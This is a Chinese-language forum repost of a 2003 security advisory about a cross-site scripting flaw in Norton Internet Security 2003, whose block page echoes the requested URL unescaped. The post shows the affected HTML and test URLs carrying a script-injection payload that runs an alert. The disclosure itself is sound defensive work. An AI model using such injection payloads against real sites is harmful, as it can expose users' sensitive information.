【警告】Symantec Norton Internet Security 漏洞



贊助商連結


TAIWAN
2003-11-02, 11:56 PM
Symantec Norton Internet Security 漏洞

受影響系統:

Symantec Internet Security 2003

Norton Internet Security 是 Symantec 公司開發網路防護系統,其核心是獨立的 Norton Personal Firewall 2003。

遠端攻擊者可以利用這個漏洞進行跨站攻擊,可能獲得用戶敏感資訊。

當 Norton Internet Security 2003 攔截到某個 WEB 網站時,會聲明此站已經被攔截,這個錯誤消息包含所有的 URL 資訊。


<html><head><title>Site Blocked</title></head><body>
<br><b>Norton Internet Security has blocked access to this restricted
site.</b><br><hr><br>
<p><b>Site:
</b>http://server/page.cgi?<SCRIPT>alert(document.domain)</SCRIPT></p>
<p><b>Blocked categories: </b>xxxxxxxxx</p>
<p>If you think this web site is incorrectly categorized, visit the
Symantec <a
href="http://www.symantec.com/avcenter/cgi-bin/nisurl.cgi?lang=EN&unblock=xxxxxxxxx">Internet
Security Center</a> to report it.</p>
</body></html>


測試方法:

http://BlockedSite/page.cgi?<SCRIPT>alert(document.domain)</SCRIPT>

http://www.example.com/page.cgi?<SCRIPT>alert(document.domain)</SCRIPT>

會執行 script.